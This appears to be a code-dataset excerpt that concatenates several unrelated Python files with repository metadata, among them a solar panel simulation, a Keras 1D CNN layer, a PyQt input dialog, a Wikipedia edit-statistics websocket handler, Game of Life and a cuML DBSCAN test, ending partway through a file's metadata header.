4849038c47199aa0a752ff5a4f2afa91f4a9e8f0
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import pandas as pd
from house.production.solar_panel import SolarPanel
from house import House
from math import pi
from time import time
start_time = time()
solar_panel_east = SolarPanel(285.0, 10*pi/180, -pi/2, 0.87, 1.540539, 10)
solar_panel_west = SolarPanel(285.0, 10*pi/180, pi/2, 0.87, 1.540539, 10)
house = House([], solar_panel_tp=(solar_panel_east, solar_panel_west))
irradiance_df = pd.read_csv(filepath_or_buffer="C:\\Users\\Lander\\Documents\\KULeuven\\2e bachelor\\semester 1\\P&O 3\\P-O-3-Smart-Energy-Home\\data\\Irradiance.csv",
header=0,
index_col="Date/Time",
dtype={"watts-per-meter-sq": float},
parse_dates=["Date/Time"]
)
start = pd.Timestamp("2016-06-17 00:00:00")
# end = pd.Timestamp("2017-04-21 23:55:00")
end = pd.Timestamp("2016-06-17 23:55:00")
times = pd.date_range(start, end, freq="300S")
data = [house.power_production(t, irradiance_df) for t in pd.date_range(start, end, freq="300S")]
# print(data)
plt.plot(data)
print(time() - start_time)
plt.show()
| 33.342857
| 167
| 0.642674
| 182
| 1,167
| 3.994505
| 0.461538
| 0.082531
| 0.035763
| 0.044017
| 0.225585
| 0.173315
| 0.173315
| 0.099037
| 0.099037
| 0.099037
| 0
| 0.105092
| 0.209083
| 1,167
| 34
| 168
| 34.323529
| 0.682557
| 0.045416
| 0
| 0
| 0
| 0.043478
| 0.179279
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.26087
| 0
| 0.26087
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a813a7003f5f5d2c9a1b282747c12188d836b770
| 2,468
|
py
|
Python
|
src/lsct/models/cnn_1d.py
|
junyongyou/lsct_phiqnet
|
ffa546b3225c7db0bc7977565dc11a91186fe939
|
[
"MIT"
] | 9
|
2021-11-01T06:06:33.000Z
|
2022-02-07T12:21:18.000Z
|
src/lsct/models/cnn_1d.py
|
junyongyou/lsct_phiqnet
|
ffa546b3225c7db0bc7977565dc11a91186fe939
|
[
"MIT"
] | null | null | null |
src/lsct/models/cnn_1d.py
|
junyongyou/lsct_phiqnet
|
ffa546b3225c7db0bc7977565dc11a91186fe939
|
[
"MIT"
] | 1
|
2022-03-06T07:38:32.000Z
|
2022-03-06T07:38:32.000Z
|
from tensorflow.keras.layers import Layer, Conv1D, Input, Dropout, MaxPool1D, Masking
import tensorflow.keras.backend as K
from tensorflow.keras import Model
import tensorflow as tf
class CNN1D(Layer):
def __init__(self, filters=(32, 64), pooling_sizes=(4, 4), kernel_size=3, stride_size=1, using_dropout=True,
using_bias=False, dropout_rate=0.1, **kwargs):
"""
1D CNN model
:param filters: filter numbers in the CNN blocks
:param pooling_sizes: max pooling size in each block
:param kernel_size: kernel size of CNN layer
:param stride_size: stride of CNN layer
:param using_dropout: flag to use dropout or not
:param using_bias: flag to use bias in CNN or not
:param dropout_rate: dropout rate if using it
:param kwargs: other config prams
"""
self.filters = filters
self.kernel_size = kernel_size
self.stride_size = stride_size
self.using_dropout = using_dropout
self.conv1d = []
self.pooling = []
self.dropout = []
for i, s_filter in enumerate(filters):
self.conv1d.append(Conv1D(s_filter,
kernel_size,
padding='same',
strides=stride_size,
use_bias=using_bias,
name='conv{}'.format(i)
))
self.pooling.append(MaxPool1D(pool_size=pooling_sizes[i], name='pool{}'.format(i)))
if using_dropout:
self.dropout = Dropout(rate=dropout_rate)
super(CNN1D, self).__init__(**kwargs)
def build(self, input_shape):
super(CNN1D, self).build(input_shape)
def call(self, x, mask=None):
for i in range(len(self.conv1d)):
x = self.conv1d[i](x)
x = self.pooling[i](x)
if self.using_dropout:
x = self.dropout(x)
x = K.squeeze(x, axis=-2)
return x
def compute_output_shape(self, input_shape):
return 1, self.filters[-1]
if __name__ == '__main__':
input_shape = (16, 5 * 256)
filters = [32, 64, 128, 256]
pooling_sizes = [2, 2, 2, 2]
inputs = Input(shape=input_shape)
x = CNN1D(filters=filters, pooling_sizes=pooling_sizes)(inputs)
model = Model(inputs=inputs, outputs=x)
model.summary()
| 37.393939
| 112
| 0.573339
| 306
| 2,468
| 4.444444
| 0.313725
| 0.052941
| 0.027941
| 0.029412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.329011
| 2,468
| 65
| 113
| 37.969231
| 0.793478
| 0.15316
| 0
| 0
| 0
| 0
| 0.011988
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.086957
| 0.021739
| 0.23913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a81435452d7a1fd0220c50904adbc5e774a45f27
| 931
|
py
|
Python
|
test/utils.py
|
eddrial/aapy
|
929f554aea24c0a893052f0907488e0a843fd5dd
|
[
"Apache-2.0"
] | null | null | null |
test/utils.py
|
eddrial/aapy
|
929f554aea24c0a893052f0907488e0a843fd5dd
|
[
"Apache-2.0"
] | null | null | null |
test/utils.py
|
eddrial/aapy
|
929f554aea24c0a893052f0907488e0a843fd5dd
|
[
"Apache-2.0"
] | null | null | null |
import json
import os
import mock
def mock_response(json_str=None, raw=None):
resp = mock.MagicMock()
if json_str is not None:
loaded_json = json.loads(json_str)
resp.json = mock.MagicMock(return_value=loaded_json)
if raw is not None:
resp.raw = mock.MagicMock()
resp.raw.read = mock.MagicMock(return_value=raw)
return resp
def get_data_filepath(filename):
"""Construct filepath for a file in the test/data directory
Args:
filename: name of file
Returns:
full path to file
"""
return os.path.join(os.path.dirname(__file__), 'data', filename)
def load_from_file(filename):
"""Load the contents of a file in the data directory.
Args:
filename: name of file to load
Returns:
contents of file as a string
"""
filepath = get_data_filepath(filename)
with open(filepath) as f:
return f.read()
| 21.159091
| 68
| 0.651987
| 133
| 931
| 4.428571
| 0.360902
| 0.088285
| 0.03056
| 0.081494
| 0.118846
| 0.118846
| 0.118846
| 0
| 0
| 0
| 0
| 0
| 0.26101
| 931
| 43
| 69
| 21.651163
| 0.856105
| 0.274973
| 0
| 0
| 0
| 0
| 0.006472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a81666f0e6701e07b7dd6f00c88fe2096ec32290
| 391
|
py
|
Python
|
archive/AIAP_v1.00/v1.2b/promoter_bin.py
|
ShaopengLiu1/Zhanglab_ATAC-seq_analysis
|
3f615c159bb04fcc3f7b777e00c5f04ff105898c
|
[
"MIT"
] | null | null | null |
archive/AIAP_v1.00/v1.2b/promoter_bin.py
|
ShaopengLiu1/Zhanglab_ATAC-seq_analysis
|
3f615c159bb04fcc3f7b777e00c5f04ff105898c
|
[
"MIT"
] | null | null | null |
archive/AIAP_v1.00/v1.2b/promoter_bin.py
|
ShaopengLiu1/Zhanglab_ATAC-seq_analysis
|
3f615c159bb04fcc3f7b777e00c5f04ff105898c
|
[
"MIT"
] | 1
|
2018-02-26T03:14:46.000Z
|
2018-02-26T03:14:46.000Z
|
import sys
peak=[]
with open(sys.argv[1],'r') as f:
for line in f:
line=line.strip('\n').split('\t')
peak.append(int(line[3]))
f.close()
num=int(len(peak)/100.0)
bin=[]
for i in range(99):
bin.append(str(i+1)+'\t'+str(sum(peak[num*i:num*(i+1)])/(num*1.0))+'\n')
bin.append('100'+'\t'+str(sum(peak[num*99:])/(num*1.0))+'\n')
with open('bin.txt','w') as f:
f.writelines(bin)
f.close
| 20.578947
| 73
| 0.59335
| 83
| 391
| 2.795181
| 0.409639
| 0.068966
| 0.060345
| 0.094828
| 0.12069
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053824
| 0.097187
| 391
| 18
| 74
| 21.722222
| 0.603399
| 0
| 0
| 0
| 0
| 0
| 0.061381
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8178087a6d24532c3fa392eae43c6d6a8b30612
| 4,595
|
py
|
Python
|
MultiInputDialog.py
|
chemmatcars/XModFit
|
7d1298448d1908d78797fd67ce0a00ecfaf17629
|
[
"MIT"
] | null | null | null |
MultiInputDialog.py
|
chemmatcars/XModFit
|
7d1298448d1908d78797fd67ce0a00ecfaf17629
|
[
"MIT"
] | 2
|
2019-07-31T23:14:14.000Z
|
2020-12-26T16:27:02.000Z
|
MultiInputDialog.py
|
chemmatcars/XModFit
|
7d1298448d1908d78797fd67ce0a00ecfaf17629
|
[
"MIT"
] | 2
|
2019-07-31T22:22:06.000Z
|
2020-07-14T04:58:16.000Z
|
from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QLabel, QLineEdit, QVBoxLayout, QMessageBox, QCheckBox,\
QSpinBox, QComboBox, QListWidget, QDialog, QFileDialog, QProgressBar, QTableWidget, QTableWidgetItem,\
QAbstractItemView, QSpinBox, QSplitter, QSizePolicy, QAbstractScrollArea, QHBoxLayout, QTextEdit, QShortcut,\
QProgressDialog
from PyQt5.QtGui import QPalette, QKeySequence, QDoubleValidator, QIntValidator
from PyQt5.QtCore import Qt, QThread, QSignalMapper
import sys
import pyqtgraph as pg
class MultiInputDialog(QDialog):
def __init__(self, inputs={'Input':'default value'}, title='Multi Input Dialog', parent=None):
QDialog.__init__(self, parent)
self.setWindowTitle(title)
self.inputs=inputs
self.intValidator = QIntValidator()
self.floatValidator = QDoubleValidator()
self.createUI()
def createUI(self):
self.vblayout = QVBoxLayout(self)
self.layoutWidget = pg.LayoutWidget()
self.vblayout.addWidget(self.layoutWidget)
self.labels={}
self.inputFields={}
for key, value in self.inputs.items():
self.labels[key] = QLabel(key)
self.layoutWidget.addWidget(self.labels[key])
if type(value)==int:
self.signalMapper1 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.intValidator)
self.inputFields[key].textChanged.connect(self.signalMapper1.map)
self.signalMapper1.setMapping(self.inputFields[key], key)
self.signalMapper1.mapped[str].connect(self.inputChanged)
elif type(value)==float:
self.signalMapper2 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.floatValidator)
self.inputFields[key].textChanged.connect(self.signalMapper2.map)
self.signalMapper2.setMapping(self.inputFields[key], key)
self.signalMapper2.mapped[str].connect(self.inputChanged)
elif type(value)==bool:
self.signalMapper3 = QSignalMapper(self)
self.inputFields[key]=QCheckBox()
self.inputFields[key].setTristate(False)
self.inputFields[key].stateChanged.connect(self.signalMapper3.map)
self.signalMapper3.setMapping(self.inputFields[key], key)
self.signalMapper3.mapped[str].connect(self.inputStateChanged)
elif type(value)==str:
self.signalMapper4 = QSignalMapper(self)
self.inputFields[key] = QLineEdit(value)
self.inputFields[key].textChanged.connect(self.signalMapper4.map)
self.signalMapper4.setMapping(self.inputFields[key], key)
self.signalMapper4.mapped[str].connect(self.inputChanged)
elif type(value)==list:
self.signalMapper5 = QSignalMapper(self)
self.inputFields[key] = QComboBox()
self.inputFields[key].addItems(value)
self.inputFields[key].currentTextChanged.connect(self.signalMapper5.map)
self.signalMapper5.setMapping(self.inputFields[key], key)
self.signalMapper5.mapped[str].connect(self.inputTextChanged)
self.layoutWidget.addWidget(self.inputFields[key])
self.layoutWidget.nextRow()
self.layoutWidget.nextRow()
self.cancelButton = QPushButton('Cancel')
self.cancelButton.clicked.connect(self.cancelandClose)
self.layoutWidget.addWidget(self.cancelButton, col=0)
self.okButton = QPushButton('OK')
self.okButton.clicked.connect(self.okandClose)
self.layoutWidget.addWidget(self.okButton, col=1)
self.okButton.setDefault(True)
def inputChanged(self, key):
self.inputs[key]=self.inputFields[key].text()
def inputStateChanged(self, key):
if self.inputFields[key].checkState():
self.inputs[key]=True
else:
self.inputs[key]=False
def inputTextChanged(self, key):
self.inputs[key]=self.inputFields[key].currentText()
print(self.inputs[key])
def okandClose(self):
self.accept()
def cancelandClose(self):
self.reject()
if __name__=='__main__':
app = QApplication(sys.argv)
dlg = MultiInputDialog(inputs={'value':100,'value2':10.0,'fit':True,'func':['Lor','Gau']})
dlg.show()
sys.exit(app.exec_())
| 47.864583
| 120
| 0.654189
| 449
| 4,595
| 6.657016
| 0.289532
| 0.120442
| 0.138508
| 0.05353
| 0.264972
| 0.241552
| 0.128137
| 0.128137
| 0.057544
| 0.057544
| 0
| 0.009078
| 0.232862
| 4,595
| 96
| 121
| 47.864583
| 0.838865
| 0
| 0
| 0.045455
| 0
| 0
| 0.016536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079545
| false
| 0
| 0.056818
| 0
| 0.147727
| 0.011364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a81b25109e2c25d80338be4ee486823e581a2347
| 3,813
|
py
|
Python
|
src/handlers.py
|
jneethling/WikiStats
|
232640bf3799851554fa4c13cee8a7f63eb532e2
|
[
"MIT"
] | null | null | null |
src/handlers.py
|
jneethling/WikiStats
|
232640bf3799851554fa4c13cee8a7f63eb532e2
|
[
"MIT"
] | 1
|
2022-01-09T12:07:13.000Z
|
2022-01-09T15:29:41.000Z
|
src/handlers.py
|
jneethling/WikiStats
|
232640bf3799851554fa4c13cee8a7f63eb532e2
|
[
"MIT"
] | null | null | null |
import os
import psutil
import json
import sqlite3
import threading
from datetime import datetime, timezone
from websocket import create_connection
class CustomHandler:
def __init__(self):
self.working = False
self.counter = 0
self.ws = None
if self.dbReady('./data/wiki_statsDB'):
self.setStatus(True, 'Function handler on standby')
else:
self.setStatus(False, 'Database error, cannot start service')
def dbReady(self, path) -> bool:
try:
self.db = sqlite3.connect(path, check_same_thread=False)
self.cursor = self.db.cursor()
self.cursor.execute('''CREATE TABLE IF NOT EXISTS stats(\
id INTEGER PRIMARY KEY,\
country_name TEXT,\
change_size INTEGER)''')
self.db.commit()
return True
except sqlite3.OperationalError:
return False
def worker(self, stop_event):
while not stop_event.is_set():
result = self.ws.recv()
country = None
if "geo_ip" in result:
j_dict = json.loads(result)
geo = j_dict.get("geo_ip")
country = geo.get("country_name")
change = j_dict.get("change_size")
if change is None:
change = 0
if country is not None:
self.cursor.execute('''INSERT INTO stats(country_name, change_size) VALUES(?,?)''', (country, change))
self.db.commit()
self.counter += 1
def setStatus(self, status, msg):
self.status = status
self.message = msg
def getStatus(self) -> json:
stat_result = os.stat('./data/wiki_statsDB')
modified = datetime.fromtimestamp(stat_result.st_mtime, tz=timezone.utc).strftime("%m/%d/%Y, %H:%M:%S")
msg = {"Status": self.status, "Message": self.message, "Working in background": self.working, "Records in session": self.counter, "DB size (bytes)": stat_result.st_size, "Modified": modified}
return msg
def getMemory(self) -> json:
memory = 1024 * 1024
proc = psutil.Process(os.getpid())
mem0 = proc.memory_info().rss
msg = str(mem0/memory) + 'Mb'
return {'Memory use': msg}
def getTotals(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, SUM(change_size) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def getCounts(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, COUNT(country_name) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def stopWork(self) -> json:
self.ws.close
self.working = False
self.kill_switch.set()
self.t.join()
self.setStatus(True, 'Function handler on standby')
msg = 'Function handler background work stopped'
return {'message': msg}
def startWork(self) -> json:
if self.working:
msg = 'Function handler already working in background, ignoring request'
return {"message": msg}
else:
self.ws = create_connection("ws://wikimon.hatnote.com:9000")
self.working = True
self.setStatus(True, 'Function handler working in background')
self.kill_switch = threading.Event()
self.t = threading.Thread(target=self.worker, args=(self.kill_switch,))
self.t.start()
msg = 'Function handler background work started'
return {'message': msg}
| 32.87069
| 199
| 0.575924
| 445
| 3,813
| 4.847191
| 0.332584
| 0.040797
| 0.031525
| 0.034771
| 0.203987
| 0.159481
| 0.159481
| 0.121465
| 0.121465
| 0.078813
| 0
| 0.009157
| 0.312615
| 3,813
| 115
| 200
| 33.156522
| 0.813812
| 0
| 0
| 0.228261
| 0
| 0
| 0.218988
| 0.007606
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.076087
| 0
| 0.293478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a81fa302f2ff4cbc6dc18bbb647920f29a503d5e
| 1,897
|
py
|
Python
|
2017/23b.py
|
mcbor/advent_of_code_2016
|
14453b970d3e0f031ae6a66f2028652b6ed870dd
|
[
"MIT"
] | 1
|
2016-12-17T10:53:22.000Z
|
2016-12-17T10:53:22.000Z
|
2017/23b.py
|
mcbor/adventofcode
|
14453b970d3e0f031ae6a66f2028652b6ed870dd
|
[
"MIT"
] | null | null | null |
2017/23b.py
|
mcbor/adventofcode
|
14453b970d3e0f031ae6a66f2028652b6ed870dd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
23b.py
~~~~~~
Advent of Code 2017 - Day 23: Coprocessor Conflagration
Part Two
Now, it's time to fix the problem.
The debug mode switch is wired directly to register a. You flip the switch,
which makes register a now start at 1 when the program is executed.
Immediately, the coprocessor begins to overheat. Whoever wrote this program
obviously didn't choose a very efficient implementation. You'll need to
optimize the program if it has any hope of completing before Santa needs
that printer working.
The coprocessor's ultimate goal is to determine the final value left in
register h once the program completes. Technically, if it had that... it
wouldn't even need to run the program.
After setting register a to 1, if the program were to run to completion,
what value would be left in register h?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
import math
def is_prime(n):
if n < 2:
return False
if n < 4:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
for i in range(5, int(math.sqrt(n)) + 1, 6):
if n % i == 0 or n % (i + 2) == 0:
return False
return True
def solve(instructions):
"""Return value of h.
Hand optimized.
"""
instr, reg, val = instructions.split('\n')[0].split()
assert instr == 'set'
assert reg == 'b'
b = int(val) * 100 + 100000
start = b - 17000
end = b + 1
return sum(not is_prime(x) for x in range(start, end, 17))
def main(argv):
if len(argv) == 2:
f = open(argv[1], 'r')
else:
sys.stderr.write('reading from stdin...\n')
f = sys.stdin
print(solve(f.read().strip()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
| 24.012658
| 79
| 0.615709
| 297
| 1,897
| 3.89899
| 0.542088
| 0.043178
| 0.02418
| 0.025907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035897
| 0.280443
| 1,897
| 78
| 80
| 24.320513
| 0.812454
| 0.508171
| 0
| 0.16129
| 0
| 0
| 0.045346
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 1
| 0.096774
| false
| 0
| 0.064516
| 0
| 0.354839
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a81fc289f1eb7f0a4f761bd960c55555bea22c98
| 4,456
|
py
|
Python
|
game_of_life.py
|
WinterWonderland/Game_of_Life
|
99eced42146a195b6a7bc423f76f0fd79f5771d2
|
[
"MIT"
] | null | null | null |
game_of_life.py
|
WinterWonderland/Game_of_Life
|
99eced42146a195b6a7bc423f76f0fd79f5771d2
|
[
"MIT"
] | null | null | null |
game_of_life.py
|
WinterWonderland/Game_of_Life
|
99eced42146a195b6a7bc423f76f0fd79f5771d2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 20 11:59:50 2018
@author: klaus
"""
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from argparse import ArgumentParser, RawTextHelpFormatter
class GameOfLife:
def __init__(self, width, height, interval, seed):
random.seed(seed)
self.height = height
self.width = width
self.interval = interval
self.epoch = 0
self.board = np.zeros((self.height, self.width))
for x in range(int(self.width / 2 - self.width / 4), int(self.width / 2 + self.width / 4 + 1)):
for y in range(int(self.height / 2 - self.height / 4), int(self.height / 2 + self.height / 4 + 1)):
self.board[y][x] = random.choice([0, 1])
self.fig, self.ax = plt.subplots(figsize=(10, 10), num=1)
self.fig.show()
self.plot_board()
def run(self):
while self.run_step():
time.sleep(self.interval)
def run_step(self):
self.epoch += 1
new_board = self.board.copy()
for x in range(self.width):
for y in range(self.height):
living_neighbors = self.board[y - 1 if y > 0 else self.height - 1][x - 1 if x > 0 else self.width - 1] + \
self.board[y - 1 if y > 0 else self.height - 1][x] + \
self.board[y - 1 if y > 0 else self.height - 1][x + 1 if x < self.width - 1 else 0] + \
self.board[y][x - 1 if x > 0 else self.width - 1] + \
self.board[y][x + 1 if x < self.width - 1 else 0] + \
self.board[y + 1 if y < self.height - 1 else 0][x - 1 if x > 0 else self.width - 1] + \
self.board[y + 1 if y < self.height - 1 else 0][x] + \
self.board[y + 1 if y < self.height - 1 else 0][x + 1 if x < self.width - 1 else 0]
if self.board[y][x] == 0 and living_neighbors == 3:
new_board[y][x] = 1
if self.board[y][x] == 1 and (living_neighbors < 2 or living_neighbors > 3):
new_board[y][x] = 0
if (self.board == new_board).all():
return False
self.board = new_board
self.plot_board()
return True
def plot_board(self):
print("Epoch:", self.epoch)
self.ax.clear()
self.ax.imshow(self.board, cmap="Greys", interpolation="None")
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if __name__ == "__main__":
argument_parser = ArgumentParser(description="""
Game of Life:
- Little python implementation of Conway's game of life.
- The game board will be visualized with matplotlib.
- See readme.md for more informations.""",
epilog="https://github.com/WinterWonderland/Game_of_Life",
formatter_class=RawTextHelpFormatter)
argument_parser.add_argument("--width",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--height",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--interval",
metavar="",
type=float,
default=0.3,
help="Interval time between each step (default=0.3)")
argument_parser.add_argument("--seed",
metavar="",
type=int,
default=None,
help="A seed for the random number generator to get identical play boards")
args = argument_parser.parse_args()
GameOfLife(width=args.width,
height=args.height,
interval=args.interval,
seed=args.seed).run()
input("press enter to quit")
| 41.64486
| 123
| 0.47711
| 521
| 4,456
| 4.001919
| 0.264875
| 0.069065
| 0.052758
| 0.031655
| 0.326139
| 0.306954
| 0.306954
| 0.235971
| 0.235971
| 0.228777
| 0
| 0.034879
| 0.414497
| 4,456
| 106
| 124
| 42.037736
| 0.764278
| 0.016607
| 0
| 0.154762
| 0
| 0
| 0.114808
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.059524
| 0
| 0.142857
| 0.011905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a820c01ed9ab1a3512b23d858002b832b81b6f26
| 506
|
py
|
Python
|
examples/snippets/data_io/df_connect/export_simple.py
|
nguyentr17/tamr-toolbox
|
1d27101eda12f937813cdbfe27e2fa9c33ac34d2
|
[
"Apache-2.0"
] | 6
|
2021-02-09T22:27:55.000Z
|
2022-01-14T18:15:17.000Z
|
examples/snippets/data_io/df_connect/export_simple.py
|
nguyentr17/tamr-toolbox
|
1d27101eda12f937813cdbfe27e2fa9c33ac34d2
|
[
"Apache-2.0"
] | 34
|
2021-02-09T22:23:33.000Z
|
2022-03-31T16:22:51.000Z
|
examples/snippets/data_io/df_connect/export_simple.py
|
nguyentr17/tamr-toolbox
|
1d27101eda12f937813cdbfe27e2fa9c33ac34d2
|
[
"Apache-2.0"
] | 12
|
2021-02-09T21:17:10.000Z
|
2022-02-09T16:35:39.000Z
|
"""
Export data from Tamr using df-connect. An example where everything is default in config file,
which implies exported data is written back to same database as ingested from.
"""
import tamr_toolbox as tbox
my_config = tbox.utils.config.from_yaml("examples/resources/conf/connect.config.yaml")
my_connect = tbox.data_io.df_connect.client.from_config(my_config)
tbox.data_io.df_connect.client.export_dataset(
my_connect, dataset_name="example_dataset", target_table_name="example_target_table",
)
| 36.142857
| 94
| 0.8083
| 79
| 506
| 4.949367
| 0.518987
| 0.069054
| 0.061381
| 0.061381
| 0.127877
| 0.127877
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102767
| 506
| 13
| 95
| 38.923077
| 0.861233
| 0.341897
| 0
| 0
| 0
| 0
| 0.24
| 0.132308
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8247bed0a1cb5051fa0d35c0fab64fca16aa20d
| 1,396
|
py
|
Python
|
python/cuML/test/test_dbscan.py
|
rongou/cuml
|
9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec
|
[
"Apache-2.0"
] | null | null | null |
python/cuML/test/test_dbscan.py
|
rongou/cuml
|
9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec
|
[
"Apache-2.0"
] | null | null | null |
python/cuML/test/test_dbscan.py
|
rongou/cuml
|
9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from cuml import DBSCAN as cuDBSCAN
from sklearn.cluster import DBSCAN as skDBSCAN
from test_utils import array_equal
import cudf
import numpy as np
@pytest.mark.parametrize('datatype', [np.float32, np.float64])
def test_dbscan_predict(datatype):
gdf = cudf.DataFrame()
gdf['0']=np.asarray([1,2,2,8,8,25],dtype=datatype)
gdf['1']=np.asarray([2,2,3,7,8,80],dtype=datatype)
X = np.array([[1, 2], [2, 2], [2, 3], [8, 7], [8, 8], [25, 80]], dtype = datatype)
print("Calling fit_predict")
cudbscan = cuDBSCAN(eps = 3, min_samples = 2)
cu_labels = cudbscan.fit_predict(gdf)
skdbscan = skDBSCAN(eps = 3, min_samples = 2)
sk_labels = skdbscan.fit_predict(X)
print(X.shape[0])
for i in range(X.shape[0]):
assert cu_labels[i] == sk_labels[i]
| 32.465116
| 86
| 0.703438
| 223
| 1,396
| 4.345291
| 0.497758
| 0.06192
| 0.026832
| 0.033024
| 0.03096
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041703
| 0.175501
| 1,396
| 42
| 87
| 33.238095
| 0.800174
| 0.401862
| 0
| 0
| 0
| 0
| 0.035452
| 0
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.05
| false
| 0
| 0.3
| 0
| 0.35
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8276b0d3215a9fe2604eec700ad87c77dc2f29b
| 769
|
py
|
Python
|
LeetCode/0023_merge_k_sorted_lists.py
|
KanegaeGabriel/ye-olde-interview-prep-grind
|
868362872523a5688f49ab48efb09c3008e0db4d
|
[
"MIT"
] | 1
|
2020-05-13T19:16:23.000Z
|
2020-05-13T19:16:23.000Z
|
